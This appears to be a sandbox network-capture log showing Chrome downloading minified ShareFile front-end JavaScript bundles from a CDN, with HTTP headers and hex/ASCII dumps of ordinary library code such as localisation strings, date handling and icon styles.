                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC7267INData Raw: 73 74 61 6e 64 22 2c 53 6b 65 74 63 68 49 63 6f 6e 3a 22 53 6b 65 74 63 68 2d 62 65 73 74 61 6e 64 22 2c 53 75 63 63 65 73 73 49 63 6f 6e 3a 22 53 75 63 63 65 73 70 69 63 74 6f 67 72 61 6d 22 2c 54 65 78 74 49 63 6f 6e 3a 22 54 65 6b 73 74 62 65 73 74 61 6e 64 22 2c 55 6e 6b 6e 6f 77 6e 49 63 6f 6e 3a 22 4f 6e 62 65 6b 65 6e 64 20 62 65 73 74 61 6e 64 22 2c 55 72 6c 49 63 6f 6e 3a 22 57 65 62 61 64 72 65 73 22 2c 56 69 64 65 6f 49 63 6f 6e 3a 22 56 69 64 65 6f 62 65 73 74 61 6e 64 22 2c 56 73 64 49 63 6f 6e 3a 22 56 69 73 69 6f 2d 62 65 73 74 61 6e 64 22 2c 57 61 72 6e 69 6e 67 49 63 6f 6e 3a 22 57 61 61 72 73 63 68 75 77 69 6e 67 73 70 69 63 74 6f 67 72 61 6d 22 2c 57 6f 72 64 49 63 6f 6e 3a 22 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 2d 62 65 73 74 61
                                                                                                                                                                                                                      Data Ascii: stand",SketchIcon:"Sketch-bestand",SuccessIcon:"Succespictogram",TextIcon:"Tekstbestand",UnknownIcon:"Onbekend bestand",UrlIcon:"Webadres",VideoIcon:"Videobestand",VsdIcon:"Visio-bestand",WarningIcon:"Waarschuwingspictogram",WordIcon:"Microsoft Word-besta
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC16384INData Raw: 25 22 2c 73 68 6f 77 5f 70 61 73 73 77 6f 72 64 3a 22 d0 9f d0 be d0 ba d0 b0 d0 b7 d0 b0 d1 82 d1 8c 20 d0 bf d0 b0 d1 80 d0 be d0 bb d1 8c 22 2c 73 76 67 3a 7b 41 69 72 49 63 6f 6e 3a 22 d0 a4 d0 b0 d0 b9 d0 bb 20 41 69 72 22 2c 41 6c 65 72 74 49 63 6f 6e 3a 22 d0 97 d0 bd d0 b0 d1 87 d0 be d0 ba 20 d0 be d1 88 d0 b8 d0 b1 d0 ba d0 b8 22 2c 41 70 70 72 6f 76 61 6c 73 46 69 6c 65 49 63 6f 6e 3a 22 d0 a4 d0 b0 d0 b9 d0 bb 20 d1 83 d1 82 d0 b2 d0 b5 d1 80 d0 b6 d0 b4 d0 b5 d0 bd d0 b8 d0 b9 22 2c 41 75 64 69 6f 49 63 6f 6e 3a 22 d0 90 d1 83 d0 b4 d0 b8 d0 be d1 84 d0 b0 d0 b9 d0 bb 22 2c 43 6f 64 65 46 69 6c 65 49 63 6f 6e 3a 22 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 ba d0 be d0 b4 d0 be d0 b2 22 2c 43 77 46 6f 72 6d 49 63 6f 6e 3a 22 d0 a8 d0 b0 d0 b1 d0 bb d0 be
                                                                                                                                                                                                                      Data Ascii: %",show_password:" ",svg:{AirIcon:" Air",AlertIcon:" ",ApprovalsFileIcon:" ",AudioIcon:"",CodeFileIcon:" ",CwFormIcon:"
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC16384INData Raw: 7b 76 61 72 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 74 79 6c 65 5b 64 61 74 61 2d 65 6d 6f 74 69 6f 6e 5d 3a 6e 6f 74 28 5b 64 61 74 61 2d 73 5d 29 22 29 3b 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 45 61 63 68 2e 63 61 6c 6c 28 6e 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 2d 31 21 3d 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 65 6d 6f 74 69 6f 6e 22 29 2e 69 6e 64 65 78 4f 66 28 22 20 22 29 26 26 28 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2c 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 22 2c 22 22 29 29 7d 29 29 7d 76 61 72 20 6f 3d 65 2e 73 74 79 6c 69 73 50 6c 75 67 69 6e 73 7c 7c 76 3b 76 61 72 20
                                                                                                                                                                                                                      Data Ascii: {var n=document.querySelectorAll("style[data-emotion]:not([data-s])");Array.prototype.forEach.call(n,(function(e){-1!==e.getAttribute("data-emotion").indexOf(" ")&&(document.head.appendChild(e),e.setAttribute("data-s",""))}))}var o=e.stylisPlugins||v;var
                                                                                                                                                                                                                      2024-11-05 19:36:23 UTC16384INData Raw: 6c 6f 6f 64 4f 70 61 63 69 74 79 3a 31 2c 73 74 6f 70 4f 70 61 63 69 74 79 3a 31 2c 73 74 72 6f 6b 65 44 61 73 68 61 72 72 61 79 3a 31 2c 73 74 72 6f 6b 65 44 61 73 68 6f 66 66 73 65 74 3a 31 2c 73 74 72 6f 6b 65 4d 69 74 65 72 6c 69 6d 69 74 3a 31 2c 73 74 72 6f 6b 65 4f 70 61 63 69 74 79 3a 31 2c 73 74 72 6f 6b 65 57 69 64 74 68 3a 31 7d 7d 2c 37 32 37 38 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 4c 3a 28 29 3d 3e 61 2c 6a 3a 28 29 3d 3e 69 7d 29 3b 76 61 72 20 72 3d 6e 28 35 39 35 34 29 2c 6f 3d 21 21 72 2e 75 73 65 49 6e 73 65 72 74 69 6f 6e 45 66 66 65 63 74 26 26 72 2e 75 73 65 49 6e 73 65 72 74 69 6f 6e 45 66 66 65 63 74 2c 61 3d 6f 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65
                                                                                                                                                                                                                      Data Ascii: loodOpacity:1,stopOpacity:1,strokeDasharray:1,strokeDashoffset:1,strokeMiterlimit:1,strokeOpacity:1,strokeWidth:1}},7278:(e,t,n)=>{"use strict";n.d(t,{L:()=>a,j:()=>i});var r=n(5954),o=!!r.useInsertionEffect&&r.useInsertionEffect,a=o||function(e){return e
                                                                                                                                                                                                                      2024-11-05 19:36:23 UTC15108INData Raw: 2e 63 6c 6f 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5a 2e 77 28 74 68 69 73 2e 24 64 2c 74 68 69 73 29 7d 2c 67 2e 74 6f 44 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 44 61 74 65 28 74 68 69 73 2e 76 61 6c 75 65 4f 66 28 29 29 7d 2c 67 2e 74 6f 4a 53 4f 4e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 73 56 61 6c 69 64 28 29 3f 74 68 69 73 2e 74 6f 49 53 4f 53 74 72 69 6e 67 28 29 3a 6e 75 6c 6c 7d 2c 67 2e 74 6f 49 53 4f 53 74 72 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 24 64 2e 74 6f 49 53 4f 53 74 72 69 6e 67 28 29 7d 2c 67 2e 74 6f 53 74 72 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 24 64
                                                                                                                                                                                                                      Data Ascii: .clone=function(){return Z.w(this.$d,this)},g.toDate=function(){return new Date(this.valueOf())},g.toJSON=function(){return this.isValid()?this.toISOString():null},g.toISOString=function(){return this.$d.toISOString()},g.toString=function(){return this.$d
                                                                                                                                                                                                                      2024-11-05 19:36:23 UTC1276INData Raw: 72 2e 6d 6f 6e 74 68 2c 69 3d 72 2e 64 61 79 2c 6c 3d 72 2e 68 6f 75 72 73 2c 63 3d 72 2e 6d 69 6e 75 74 65 73 2c 73 3d 72 2e 73 65 63 6f 6e 64 73 2c 75 3d 72 2e 6d 69 6c 6c 69 73 65 63 6f 6e 64 73 2c 64 3d 72 2e 7a 6f 6e 65 2c 70 3d 6e 65 77 20 44 61 74 65 2c 68 3d 69 7c 7c 28 6f 7c 7c 61 3f 31 3a 70 2e 67 65 74 44 61 74 65 28 29 29 2c 6d 3d 6f 7c 7c 70 2e 67 65 74 46 75 6c 6c 59 65 61 72 28 29 2c 76 3d 30 3b 6f 26 26 21 61 7c 7c 28 76 3d 61 3e 30 3f 61 2d 31 3a 70 2e 67 65 74 4d 6f 6e 74 68 28 29 29 3b 76 61 72 20 67 3d 6c 7c 7c 30 2c 79 3d 63 7c 7c 30 2c 45 3d 73 7c 7c 30 2c 62 3d 75 7c 7c 30 3b 72 65 74 75 72 6e 20 64 3f 6e 65 77 20 44 61 74 65 28 44 61 74 65 2e 55 54 43 28 6d 2c 76 2c 68 2c 67 2c 79 2c 45 2c 62 2b 36 30 2a 64 2e 6f 66 66 73 65 74 2a
                                                                                                                                                                                                                      Data Ascii: r.month,i=r.day,l=r.hours,c=r.minutes,s=r.seconds,u=r.milliseconds,d=r.zone,p=new Date,h=i||(o||a?1:p.getDate()),m=o||p.getFullYear(),v=0;o&&!a||(v=a>0?a-1:p.getMonth());var g=l||0,y=c||0,E=s||0,b=u||0;return d?new Date(Date.UTC(m,v,h,g,y,E,b+60*d.offset*


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      118192.168.2.174984213.224.189.1154437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:21 UTC423OUTGET /sharefile-web/sharefiledev-view-engine-pilet/1.24.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC522INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 120056
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Wed, 23 Oct 2024 00:52:04 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:21 GMT
                                                                                                                                                                                                                      ETag: "33040c25dcd11460d4fcaf829905e8bd"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 2bbba694ff55d664208103e9c25dce14.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: I7yp0-22WUc1YjmdpnrlimBz2y1rFA_Pj_ktom4GwrznF8zBrSMHpQ==
                                                                                                                                                                                                                      Age: 2
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC15862INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 76 69 65 77 65 6e 67 69 6e 65 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6f 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevviewenginepilet,{})System.register(["@sharefiledev/antd-config","antd","react","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={};return Object.defineProperty(o,"__esModule"
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC16384INData Raw: 3c 72 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 75 6e 64 65 66 69 6e 65 64 3b 69 66 28 6f 5b 72 5b 69 5d 5d 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 29 7b 66 6f 72 28 76 61 72 20 61 3d 32 2c 73 3d 72 2e 73 6c 69 63 65 28 69 2c 69 2b 61 29 2e 6a 6f 69 6e 28 6e 29 2c 75 3d 6f 5b 73 5d 3b 75 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 72 2e 6c 65 6e 67 74 68 3e 69 2b 61 3b 29 61 2b 2b 2c 75 3d 6f 5b 73 3d 72 2e 73 6c 69 63 65 28 69 2c 69 2b 61 29 2e 6a 6f 69 6e 28 6e 29 5d 3b 69 66 28 75 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 29 72 65 74 75 72 6e 20 75 6e 64 65 66 69 6e 65 64 3b 69 66 28 6e 75 6c 6c 3d 3d 3d 75 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 69 66 28 74 2e 65 6e 64 73 57 69 74 68 28 73 29 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 75
                                                                                                                                                                                                                      Data Ascii: <r.length)return undefined;if(o[r[i]]===undefined){for(var a=2,s=r.slice(i,i+a).join(n),u=o[s];u===undefined&&r.length>i+a;)a++,u=o[s=r.slice(i,i+a).join(n)];if(u===undefined)return undefined;if(null===u)return null;if(t.endsWith(s)){if("string"==typeof u
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC16384INData Raw: 2e 6c 6f 61 64 26 26 69 28 74 68 69 73 2e 66 6f 72 6d 61 74 4c 61 6e 67 75 61 67 65 43 6f 64 65 28 65 29 29 2c 22 6c 61 6e 67 75 61 67 65 4f 6e 6c 79 22 21 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6c 6f 61 64 26 26 22 63 75 72 72 65 6e 74 4f 6e 6c 79 22 21 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6c 6f 61 64 26 26 69 28 74 68 69 73 2e 67 65 74 53 63 72 69 70 74 50 61 72 74 46 72 6f 6d 43 6f 64 65 28 65 29 29 2c 22 63 75 72 72 65 6e 74 4f 6e 6c 79 22 21 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6c 6f 61 64 26 26 69 28 74 68 69 73 2e 67 65 74 4c 61 6e 67 75 61 67 65 50 61 72 74 46 72 6f 6d 43 6f 64 65 28 65 29 29 29 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 69 28 74 68 69 73 2e 66 6f 72 6d 61 74 4c 61 6e 67 75 61 67 65 43 6f
                                                                                                                                                                                                                      Data Ascii: .load&&i(this.formatLanguageCode(e)),"languageOnly"!==this.options.load&&"currentOnly"!==this.options.load&&i(this.getScriptPartFromCode(e)),"currentOnly"!==this.options.load&&i(this.getLanguagePartFromCode(e))):"string"==typeof e&&i(this.formatLanguageCo
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC16384INData Raw: 73 2c 75 2c 6c 2c 63 2c 66 3b 72 3d 6e 2e 6c 6f 61 64 65 64 2c 73 3d 69 2c 6c 3d 45 28 72 2c 5b 6f 5d 2c 4f 62 6a 65 63 74 29 2c 63 3d 6c 2e 6f 62 6a 2c 66 3d 6c 2e 6b 2c 63 5b 66 5d 3d 63 5b 66 5d 7c 7c 5b 5d 2c 75 26 26 28 63 5b 66 5d 3d 63 5b 66 5d 2e 63 6f 6e 63 61 74 28 73 29 29 2c 75 7c 7c 63 5b 66 5d 2e 70 75 73 68 28 73 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 70 65 6e 64 69 6e 67 5b 74 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 28 64 65 6c 65 74 65 20 65 2e 70 65 6e 64 69 6e 67 5b 74 5d 2c 65 2e 70 65 6e 64 69 6e 67 43 6f 75 6e 74 2d 2d 29 7d 28 6e 2c 65 29 2c 74 26 26 6e 2e 65 72 72 6f 72 73 2e 70 75 73 68 28 74 29 2c 30 21 3d 3d 6e 2e 70 65 6e 64 69 6e 67 43 6f 75 6e 74 7c 7c 6e 2e 64 6f 6e 65 7c 7c 28 4f 62 6a 65 63 74 2e 6b 65
                                                                                                                                                                                                                      Data Ascii: s,u,l,c,f;r=n.loaded,s=i,l=E(r,[o],Object),c=l.obj,f=l.k,c[f]=c[f]||[],u&&(c[f]=c[f].concat(s)),u||c[f].push(s),function(e,t){e.pending[t]!==undefined&&(delete e.pending[t],e.pendingCount--)}(n,e),t&&n.errors.push(t),0!==n.pendingCount||n.done||(Object.ke
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC16384INData Raw: 70 61 63 65 2e 62 69 6e 64 28 69 29 7d 2c 69 7d 7d 2c 7b 6b 65 79 3a 22 74 6f 4a 53 4f 4e 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 6f 70 74 69 6f 6e 73 3a 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2c 73 74 6f 72 65 3a 74 68 69 73 2e 73 74 6f 72 65 2c 6c 61 6e 67 75 61 67 65 3a 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 2c 6c 61 6e 67 75 61 67 65 73 3a 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 73 2c 72 65 73 6f 6c 76 65 64 4c 61 6e 67 75 61 67 65 3a 74 68 69 73 2e 72 65 73 6f 6c 76 65 64 4c 61 6e 67 75 61 67 65 7d 7d 7d 5d 29 2c 6e 7d 28 6b 29 3b 28 30 2c 6f 2e 41 29 28 76 65 2c 22 63 72 65 61 74 65 49 6e 73 74 61 6e 63 65 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e
                                                                                                                                                                                                                      Data Ascii: pace.bind(i)},i}},{key:"toJSON",value:function(){return{options:this.options,store:this.store,language:this.language,languages:this.languages,resolvedLanguage:this.resolvedLanguage}}}]),n}(k);(0,o.A)(ve,"createInstance",(function(){var e=arguments.length>
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC16384INData Raw: 5c 6e 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 5c 6e 7d 5c 6e 5c 6e 2e 61 6e 74 69 63 6f 6e 3a 3a 62 65 66 6f 72 65 20 7b 5c 6e 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 5c 6e 7d 5c 6e 5c 6e 2e 61 6e 74 69 63 6f 6e 20 2e 61 6e 74 69 63 6f 6e 2d 69 63 6f 6e 20 7b 5c 6e 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 5c 6e 7d 5c 6e 5c 6e 2e 61 6e 74 69 63 6f 6e 5b 74 61 62 69 6e 64 65 78 5d 20 7b 5c 6e 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 5c 6e 7d 5c 6e 5c 6e 2e 61 6e 74 69 63 6f 6e 2d 73 70 69 6e 3a 3a 62 65 66 6f 72 65 2c 5c 6e 2e 61 6e 74 69 63 6f 6e 2d 73 70 69 6e 20 7b 5c 6e 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 5c 6e 20 20 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61
                                                                                                                                                                                                                      Data Ascii: \n display: inline-block;\n}\n\n.anticon::before {\n display: none;\n}\n\n.anticon .anticon-icon {\n display: block;\n}\n\n.anticon[tabindex] {\n cursor: pointer;\n}\n\n.anticon-spin::before,\n.anticon-spin {\n display: inline-block;\n -webkit-anima
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC16384INData Raw: 72 74 73 3d 61 7d 2c 37 38 31 30 39 3a 65 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 73 7d 2c 34 36 33 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 76 61 72 20 72 3d 6e 28 37 33 37 33 38 29 5b 22 64 65 66 61 75 6c 74 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 65 2e 65 78 70 6f 72 74 73 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3d 21 30 2c 65 2e 65 78 70 6f 72 74 73 5b 22 64 65 66 61 75 6c 74 22 5d 3d 65 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 74 2c 6e 3d 7b 7d 2c 69 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2c 61 3d 69 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 73 3d 4f 62 6a 65 63 74
                                                                                                                                                                                                                      Data Ascii: rts=a},78109:e=>{"use strict";e.exports=s},4633:(e,t,n)=>{var r=n(73738)["default"];function o(){"use strict";e.exports=o=function(){return n},e.exports.__esModule=!0,e.exports["default"]=e.exports;var t,n={},i=Object.prototype,a=i.hasOwnProperty,s=Object
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC5890INData Raw: 76 61 72 20 61 3d 6e 26 26 28 22 6c 6f 61 64 22 3d 3d 3d 6e 2e 74 79 70 65 3f 22 6d 69 73 73 69 6e 67 22 3a 6e 2e 74 79 70 65 29 2c 73 3d 6e 26 26 6e 2e 74 61 72 67 65 74 26 26 6e 2e 74 61 72 67 65 74 2e 68 72 65 66 7c 7c 74 2c 75 3d 6e 65 77 20 45 72 72 6f 72 28 22 4c 6f 61 64 69 6e 67 20 43 53 53 20 63 68 75 6e 6b 20 22 2b 65 2b 22 20 66 61 69 6c 65 64 2e 5c 6e 28 22 2b 73 2b 22 29 22 29 3b 75 2e 63 6f 64 65 3d 22 43 53 53 5f 43 48 55 4e 4b 5f 4c 4f 41 44 5f 46 41 49 4c 45 44 22 2c 75 2e 74 79 70 65 3d 61 2c 75 2e 72 65 71 75 65 73 74 3d 73 2c 69 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 69 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 69 29 2c 6f 28 75 29 7d 7d 2c 69 2e 68 72 65 66 3d 74 2c 6e 3f 6e 2e 70 61 72 65 6e 74 4e 6f 64
                                                                                                                                                                                                                      Data Ascii: var a=n&&("load"===n.type?"missing":n.type),s=n&&n.target&&n.target.href||t,u=new Error("Loading CSS chunk "+e+" failed.\n("+s+")");u.code="CSS_CHUNK_LOAD_FAILED",u.type=a,u.request=s,i.parentNode&&i.parentNode.removeChild(i),o(u)}},i.href=t,n?n.parentNod


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      119192.168.2.174983813.224.189.1154437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:21 UTC427OUTGET /sharefile-web/sharefiledev-task-aggregator-pilet/1.0.23/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC522INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 124348
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Wed, 23 Oct 2024 01:04:00 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:21 GMT
                                                                                                                                                                                                                      ETag: "4e4e4fd0b0580ef04c25c9db829e370f"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 41f60102fc29156bc5001d6646f75c02.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: trR8CMIpAS4r6SndI2F4xbvKDgO0iofs5F2wCjcCGduYIHFBc97gXg==
                                                                                                                                                                                                                      Age: 2
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 74 61 73 6b 61 67 67 72 65 67 61 74 6f 72 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 69 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevtaskaggregatorpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={};return Object.defineProperty(i,"__esModule"
                                                                                                                                                                                                                      2024-11-05 19:36:22 UTC16384INData Raw: 65 2c 74 29 7d 3b 63 6f 6e 73 74 20 6c 65 3d 75 65 3b 66 75 6e 63 74 69 6f 6e 20 66 65 28 65 2c 74 29 7b 6c 65 28 65 2c 22 5b 40 61 6e 74 2d 64 65 73 69 67 6e 2f 69 63 6f 6e 73 5d 20 22 2e 63 6f 6e 63 61 74 28 74 29 29 7d 76 61 72 20 70 65 3d 7b 77 69 64 74 68 3a 22 31 65 6d 22 2c 68 65 69 67 68 74 3a 22 31 65 6d 22 2c 66 69 6c 6c 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 2c 66 6f 63 75 73 61 62 6c 65 3a 22 66 61 6c 73 65 22 7d 2c 64 65 3d 5b 22 63 6c 61 73 73 4e 61 6d 65 22 2c 22 63 6f 6d 70 6f 6e 65 6e 74 22 2c 22 76 69 65 77 42 6f 78 22 2c 22 73 70 69 6e 22 2c 22 72 6f 74 61 74 65 22 2c 22 74 61 62 49 6e 64 65 78 22 2c 22 6f 6e 43 6c 69 63 6b 22 2c 22 63 68 69 6c 64 72 65 6e 22 5d 2c 68
                                                                                                                                                                                                                      Data Ascii: e,t)};const le=ue;function fe(e,t){le(e,"[@ant-design/icons] ".concat(t))}var pe={width:"1em",height:"1em",fill:"currentColor","aria-hidden":"true",focusable:"false"},de=["className","component","viewBox","spin","rotate","tabIndex","onClick","children"],h
